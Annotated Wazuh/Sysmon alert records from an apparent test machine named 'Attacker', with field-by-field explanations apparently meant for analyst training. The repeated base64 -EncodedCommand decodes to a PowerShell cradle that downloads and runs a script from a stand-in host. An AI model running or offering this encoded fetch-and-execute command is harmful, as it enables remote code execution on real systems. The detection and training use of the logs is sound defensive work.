CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd39-680a-550b-000000000e00}
ParentProcessId: 11904
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:48.495 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd3c-680a-570b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd39-680a-550b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11904 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 63 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534272.1496244 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:50.4145156Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284108 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:50.403
ProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00}
ProcessId: 10384
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_40uxjzck.fes.ps1
CreationUtcTime: 2025-04-24 22:37:50.403
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:50.403 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd3c-680a-570b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_40uxjzck.fes.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:50.403 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 60 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534275.1499013 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:53.3104930Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284125 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:51.737
ProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00}
ProcessId: 9020
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00}
ParentProcessId: 10384
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:51.737 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd3f-680a-590b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 64 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534275.1507080 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:53.5659094Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284126 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:53.554
ProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00}
ProcessId: 9020
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_aeouh1r0.rm1.ps1
CreationUtcTime: 2025-04-24 22:37:53.551
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:53.554 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd3f-680a-590b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_aeouh1r0.rm1.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:53.551 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 61 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534277.1509845 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:54.9897371Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284143 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:54.445
ProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00}
ProcessId: 5944
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00}
ParentProcessId: 9020
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:54.445 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd42-680a-5b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5944 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
